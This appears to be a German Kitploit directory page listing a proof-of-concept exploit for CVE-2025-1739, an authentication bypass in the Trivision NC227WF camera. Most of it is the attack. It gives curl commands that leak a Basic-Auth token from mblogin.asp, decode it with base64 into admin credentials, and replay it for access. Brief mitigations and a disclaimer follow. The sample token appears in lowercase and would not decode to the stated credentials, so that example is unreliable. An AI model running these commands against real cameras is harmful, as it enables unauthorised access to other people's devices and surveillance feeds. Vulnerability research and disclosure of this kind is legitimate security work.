Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-1739 — 0day PoC for CVE-2025-1739 | Kitploit
Tools/GitHubGitHub/n0n4m3x41/cve-2025-1739
Authentication & AuthorizationEmbedded Systems SecurityIoT SecurityVulnerability AnalysisExploitationWeb Application ExploitationLearning & Education
GitHubn0n4m3x41/cve-2025-1739

CVE-2025-1739

0day PoC for CVE-2025-1739

Repository anzeigen
vor 4 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-1738 & CVE-2025-1739 — Trivision Camera NC227WF PoC

📋 Überblick

CVECVSS v3.1ScoreCWETyp
CVE-2025-1739AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N7.1CWE-288Authentifizierungsumgehung durch Basic-Auth-Leck

🔓 CVE-2025-1739 — Basic-Auth-Code-Offenlegung / Authentifizierungsumgehung (CWE-288)

Beschreibung

Die Kamera gibt einen gültigen, Base64-kodierten Basic-Authentifizierungs-Token über den Endpunkt mblogin.asp preis. Dieser Token kann trivial decodiert und wiederverwendet werden, um unbefugten Zugriff auf das Gerät zu erhalten – keine Passwortkenntnis erforderlich.

  • Angriffsvektor: Angrenzendes Netzwerk (AV:A)
  • CVSS-Score: 7.1
  • CWE: CWE-288 (Authentifizierungsumgehung über einen alternativen Pfad oder Kanal)

Payload

root@kitploit:~
curl -u admin:whatever http://<CAMERA_IP>:<PORT> --request-target en/mobile/mblogin.asp
image

Beispielantwort

Die Antwort enthält einen gültigen Basic-Auth-Token:

root@kitploit:~
ywrtaw46vw5ndwvzc2fibguxmjmh

Decodieren des Tokens

root@kitploit:~
echo "ywrtaw46vw5ndwvzc2fibguxmjmh" | base64 -d
# Ausgabe: admin:unguessable123!

Wiederverwendung des Tokens

root@kitploit:~
curl -H "Authorization: Basic ywrtaw46vw5ndwvzc2fibguxmjmh" http://<CAMERA_IP>:<PORT>/

🛡️ Gegenmaßnahmen

  • Aktualisieren Sie die Firmware, falls eine gepatchte Version von Trivision verfügbar ist.
  • Isolieren Sie die Kamera in einem dedizierten VLAN ohne externen Zugriff.
  • Schützen Sie den Verwaltungsport der Kamera durch eine Firewall vor nicht vertrauenswürdigen Netzwerksegmenten.
  • Ändern Sie die Standard-Anmeldeinformationen und rotieren Sie regelmäßig die Passwörter.
  • Überwachen Sie auf unerwarteten Zugriff auf activex_pal.asp und mblogin.asp.

⚖️ Haftungsausschluss

Dieses Repository dient ausschließlich zu Bildungszwecken und autorisierter Sicherheitsforschung. Die Autoren übernehmen keine Verantwortung für Missbrauch. Holen Sie vor dem Testen eines Geräts immer eine ausdrückliche Genehmigung ein.

Tool herunterladen